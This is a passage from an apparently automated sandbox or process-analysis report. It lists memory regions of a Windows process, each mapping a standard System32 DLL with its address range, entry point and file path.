"c:\\windows\\system32\\clusapi.dll") Region: id = 2111 start_va = 0x7ff96c110000 end_va = 0x7ff96c11cfff entry_point = 0x7ff96c110000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2112 start_va = 0x7ff96c140000 end_va = 0x7ff96c1c2fff entry_point = 0x7ff96c140000 region_type = mapped_file name = "wbemess.dll" filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll") Region: id = 2113 start_va = 0x7ff96c1f0000 end_va = 0x7ff96c24afff entry_point = 0x7ff96c1f0000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2114 start_va = 0x7ff96c2d0000 end_va = 0x7ff96c2e0fff entry_point = 0x7ff96c2d0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2115 start_va = 0x7ff96c810000 end_va = 0x7ff96c82ffff entry_point = 0x7ff96c810000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2116 start_va = 0x7ff96c850000 end_va = 0x7ff96c8cffff entry_point = 0x7ff96c850000 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2117 start_va = 0x7ff96c8f0000 end_va = 0x7ff96c900fff entry_point = 0x7ff96c8f0000 region_type = mapped_file name = "tetheringclient.dll" filename = "\\Windows\\System32\\tetheringclient.dll" (normalized: "c:\\windows\\system32\\tetheringclient.dll") Region: id = 2118 start_va = 0x7ff96c920000 end_va = 0x7ff96c94dfff entry_point = 0x7ff96c920000 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2119 start_va = 0x7ff96c950000 end_va = 0x7ff96c9acfff entry_point = 0x7ff96c950000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2120 start_va = 0x7ff96ca60000 end_va = 0x7ff96caa0fff entry_point = 0x7ff96ca60000 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2121 start_va = 0x7ff96cbd0000 end_va = 0x7ff96cbddfff entry_point = 0x7ff96cbd0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2122 start_va = 0x7ff96cbe0000 end_va = 0x7ff96cbe7fff entry_point = 0x7ff96cbe0000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2123 start_va = 0x7ff96cbf0000 end_va = 0x7ff96cc00fff entry_point = 0x7ff96cbf0000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2124 start_va = 0x7ff96cc10000 end_va = 0x7ff96cc21fff entry_point = 0x7ff96cc10000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2125 start_va = 0x7ff96cce0000 end_va = 0x7ff96ccebfff entry_point = 0x7ff96cce0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2126 start_va = 0x7ff96ccf0000 end_va = 0x7ff96cd06fff entry_point = 0x7ff96ccf0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2127 start_va = 0x7ff96cd10000 end_va = 0x7ff96cd55fff entry_point = 0x7ff96cd10000 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 2128 start_va = 0x7ff96cde0000 end_va = 0x7ff96ce11fff entry_point = 0x7ff96cde0000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 2129 start_va = 0x7ff96ce20000 end_va = 0x7ff96ce5ffff entry_point = 0x7ff96ce20000 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2130 start_va = 0x7ff96cef0000 end_va = 0x7ff96cf37fff entry_point = 0x7ff96cef0000 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2131 start_va = 0x7ff96cf40000 end_va = 0x7ff96cf8bfff entry_point = 0x7ff96cf40000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2132 start_va = 0x7ff96cf90000 end_va = 0x7ff96cfeefff entry_point = 0x7ff96cf90000 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 2133 start_va = 0x7ff96cff0000 end_va = 0x7ff96d004fff entry_point = 0x7ff96cff0000 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2134 start_va = 0x7ff96d010000 end_va = 0x7ff96d02cfff entry_point = 0x7ff96d010000 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2135 start_va = 0x7ff96d230000 end_va = 0x7ff96d293fff entry_point = 0x7ff96d230000 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2136 start_va = 0x7ff96d300000 end_va = 0x7ff96d314fff entry_point = 0x7ff96d300000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2137 start_va = 0x7ff96d320000 end_va = 0x7ff96d35efff entry_point = 0x7ff96d320000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2138 start_va = 0x7ff96d8b0000 end_va = 0x7ff96d8c7fff entry_point = 0x7ff96d8b0000 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2139 start_va = 0x7ff96d8d0000 end_va = 0x7ff96d8f2fff entry_point = 0x7ff96d8d0000 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2140 start_va = 0x7ff96d940000 end_va = 0x7ff96d984fff entry_point = 0x7ff96d940000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2141 start_va = 0x7ff96dad0000 end_va = 0x7ff96dbc0fff entry_point = 0x7ff96dad0000 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2142 start_va = 0x7ff96dea0000 end_va = 0x7ff96deb3fff entry_point = 0x7ff96dea0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2143 start_va = 0x7ff96def0000 end_va = 0x7ff96def9fff entry_point = 0x7ff96def0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2144 start_va = 0x7ff96df20000 end_va = 0x7ff96df9efff entry_point = 0x7ff96df20000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2145 start_va = 0x7ff96dfa0000 end_va = 0x7ff96dfdbfff entry_point = 0x7ff96dfa0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2146 start_va = 0x7ff96e000000 end_va = 0x7ff96e0d5fff entry_point = 0x7ff96e000000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2147 start_va = 0x7ff96e0e0000 end_va = 0x7ff96e0f7fff entry_point = 0x7ff96e0e0000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2148 start_va = 0x7ff96e170000 end_va = 0x7ff96e2f2fff entry_point = 0x7ff96e170000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2149 start_va = 0x7ff96e3f0000 end_va = 0x7ff96e481fff entry_point = 0x7ff96e3f0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 2150 start_va = 0x7ff96e4e0000 end_va = 0x7ff96e518fff entry_point = 0x7ff96e4e0000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2151 start_va = 0x7ff96e520000 end_va = 0x7ff96e528fff entry_point = 0x7ff96e520000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2152 start_va = 0x7ff96e530000 end_va = 0x7ff96e564fff entry_point = 0x7ff96e530000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2153 start_va = 0x7ff96ecc0000 end_va = 0x7ff96ecf5fff entry_point = 0x7ff96ecc0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2154 start_va = 0x7ff96f050000 end_va = 0x7ff96f058fff entry_point = 0x7ff96f050000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2155 start_va = 0x7ff96f060000 end_va = 0x7ff96f08cfff entry_point = 0x7ff96f060000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2156 start_va = 0x7ff96f090000 end_va = 0x7ff96f09ffff entry_point = 0x7ff96f090000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2157 start_va = 0x7ff96f0a0000 end_va = 0x7ff96f0f0fff entry_point = 0x7ff96f0a0000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2158 start_va = 0x7ff96f160000 end_va = 0x7ff96f16bfff entry_point = 0x7ff96f160000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 2159 start_va = 0x7ff96f170000 end_va = 0x7ff96f22dfff entry_point = 0x7ff96f170000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2160 start_va = 0x7ff96f4b0000 end_va = 0x7ff96f545fff entry_point = 0x7ff96f4b0000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2161 start_va = 0x7ff96f5b0000 end_va = 0x7ff96f5c9fff entry_point = 0x7ff96f5b0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2162 start_va = 0x7ff96f5d0000 end_va = 0x7ff96f5e5fff entry_point = 0x7ff96f5d0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2163 start_va = 0x7ff96f600000 end_va = 0x7ff96f667fff entry_point = 0x7ff96f600000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2164 start_va = 0x7ff96f790000 end_va = 0x7ff96f7abfff entry_point = 0x7ff96f790000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2165 start_va = 0x7ff96fca0000 end_va = 0x7ff96fdd0fff entry_point = 0x7ff96fca0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2166 start_va = 0x7ff96fde0000 end_va = 0x7ff96fdeffff entry_point = 0x7ff96fde0000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 2167 start_va = 0x7ff96fe20000 end_va = 0x7ff96fe4dfff entry_point = 0x7ff96fe20000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 2168 start_va = 0x7ff970e50000 end_va = 0x7ff970e7cfff entry_point = 0x7ff970e50000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2169 start_va = 0x7ff970e80000 end_va = 0x7ff970e95fff entry_point = 0x7ff970e80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2170 start_va = 0x7ff970ea0000 end_va = 0x7ff970eddfff entry_point = 0x7ff970ea0000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2171 start_va = 0x7ff9710a0000 end_va = 0x7ff9710b7fff entry_point = 0x7ff9710a0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2172 start_va = 0x7ff9710c0000 end_va = 0x7ff971173fff entry_point = 0x7ff9710c0000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 2173 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2174 start_va = 0x7ff971430000 end_va = 0x7ff97149dfff entry_point = 0x7ff971430000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 2175 start_va = 0x7ff971910000 end_va = 0x7ff971974fff entry_point = 0x7ff971910000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2176 start_va = 0x7ff971980000 end_va = 0x7ff971996fff entry_point = 0x7ff971980000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2177 start_va = 0x7ff9719a0000 end_va = 0x7ff9719e1fff entry_point = 0x7ff9719a0000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 2178 start_va = 0x7ff9719f0000 end_va = 0x7ff971a0dfff entry_point = 0x7ff9719f0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2179 start_va = 0x7ff971a10000 end_va = 0x7ff971a36fff entry_point = 0x7ff971a10000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 2180 start_va = 0x7ff971b50000 end_va = 0x7ff971b60fff entry_point = 0x7ff971b50000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2181 start_va = 0x7ff971b70000 end_va = 0x7ff971b82fff entry_point = 0x7ff971b70000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2182 start_va = 0x7ff971df0000 end_va = 0x7ff971e69fff entry_point = 0x7ff971df0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2183 start_va = 0x7ff971ee0000 end_va = 0x7ff971f34fff entry_point = 0x7ff971ee0000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 2184 start_va = 0x7ff971f40000 end_va = 0x7ff971f4afff entry_point = 0x7ff971f40000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2185 start_va = 0x7ff971f50000 end_va = 0x7ff971f87fff entry_point = 0x7ff971f50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2186 start_va = 0x7ff9724f0000 end_va = 0x7ff9724fcfff entry_point = 0x7ff9724f0000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 2187 start_va = 0x7ff972530000 end_va = 0x7ff97256ffff entry_point = 0x7ff972530000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 2188 start_va = 0x7ff9725e0000 end_va = 0x7ff9726dbfff entry_point = 0x7ff9725e0000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 2189 start_va = 0x7ff9726e0000 end_va = 0x7ff9726effff entry_point = 0x7ff9726e0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 2190 start_va = 0x7ff9726f0000 end_va = 0x7ff9727affff entry_point = 0x7ff9726f0000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 2191 start_va = 0x7ff9727b0000 end_va = 0x7ff9727b9fff entry_point = 0x7ff9727b0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2192 start_va = 0x7ff9727e0000 end_va = 0x7ff9727f7fff entry_point = 0x7ff9727e0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2193 start_va = 0x7ff9728d0000 end_va = 0x7ff972a1cfff entry_point = 0x7ff9728d0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 2194 start_va = 0x7ff973070000 end_va = 0x7ff973082fff entry_point = 0x7ff973070000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2195 start_va = 0x7ff973450000 end_va = 0x7ff973476fff entry_point = 0x7ff973450000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2196 start_va = 0x7ff9734b0000 end_va = 0x7ff9734bbfff entry_point = 0x7ff9734b0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 2197 start_va = 0x7ff9735c0000 end_va = 0x7ff9735f1fff entry_point = 0x7ff9735c0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2198 start_va = 0x7ff9736d0000 end_va = 0x7ff973751fff entry_point = 0x7ff9736d0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2199 start_va = 0x7ff973880000 end_va = 0x7ff9738a2fff entry_point = 0x7ff973880000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2200 start_va = 0x7ff9739b0000 end_va = 0x7ff9739bbfff entry_point = 0x7ff9739b0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 2201 start_va = 0x7ff973a20000 end_va = 0x7ff973a67fff entry_point = 0x7ff973a20000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 2202 start_va = 0x7ff973b90000 end_va = 0x7ff973babfff entry_point = 0x7ff973b90000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2203 start_va = 0x7ff973bb0000 end_va = 0x7ff973bd5fff entry_point = 0x7ff973bb0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2204 start_va = 0x7ff973be0000 end_va = 0x7ff973bebfff entry_point = 0x7ff973be0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2205 start_va = 0x7ff973ca0000 end_va = 0x7ff973cd1fff entry_point = 0x7ff973ca0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2206 start_va = 0x7ff973d80000 end_va = 0x7ff973d89fff entry_point = 0x7ff973d80000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 2207 start_va = 0x7ff973e20000 end_va = 0x7ff973e52fff entry_point = 0x7ff973e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2208 start_va = 0x7ff973f10000 end_va = 0x7ff973fb7fff entry_point = 0x7ff973f10000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2209 start_va = 0x7ff973fc0000 end_va = 0x7ff973ffdfff entry_point = 0x7ff973fc0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2210 start_va = 0x7ff974000000 end_va = 0x7ff97401efff entry_point = 0x7ff974000000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2211 start_va = 0x7ff974170000 end_va = 0x7ff9741ccfff entry_point = 0x7ff974170000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2212 start_va = 0x7ff9741d0000 end_va = 0x7ff9741e6fff entry_point = 0x7ff9741d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2213 start_va = 0x7ff974340000 end_va = 0x7ff97434afff entry_point = 0x7ff974340000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2214 start_va = 0x7ff974380000 end_va = 0x7ff9743a0fff entry_point = 0x7ff974380000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 2215 start_va = 0x7ff9743d0000 end_va = 0x7ff974405fff entry_point = 0x7ff9743d0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 2216 start_va = 0x7ff974410000 end_va = 0x7ff974435fff entry_point = 0x7ff974410000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 2217 start_va = 0x7ff974520000 end_va = 0x7ff97454bfff entry_point = 0x7ff974520000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2218 start_va = 0x7ff9746f0000 end_va = 0x7ff9746f7fff entry_point = 0x7ff9746f0000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 2219 start_va = 0x7ff974700000 end_va = 0x7ff974719fff entry_point = 0x7ff974700000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 2220 start_va = 0x7ff974720000 end_va = 0x7ff97478afff entry_point = 0x7ff974720000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2221 start_va = 0x7ff974790000 end_va = 0x7ff974827fff entry_point = 0x7ff974790000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 2222 start_va = 0x7ff974830000 end_va = 0x7ff974887fff entry_point = 0x7ff974830000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2223 start_va = 0x7ff9748a0000 end_va = 0x7ff9748c7fff entry_point = 0x7ff9748a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2224 start_va = 0x7ff974960000 end_va = 0x7ff974970fff entry_point = 0x7ff974960000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2225 start_va = 0x7ff974980000 end_va = 0x7ff974992fff entry_point = 0x7ff974980000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2226 start_va = 0x7ff9749a0000 end_va = 0x7ff9749aefff entry_point = 0x7ff9749a0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2227 start_va = 0x7ff9749b0000 end_va = 0x7ff9749f9fff entry_point = 0x7ff9749b0000 region_type = mapped_file name = "powrprof.dll" filename = 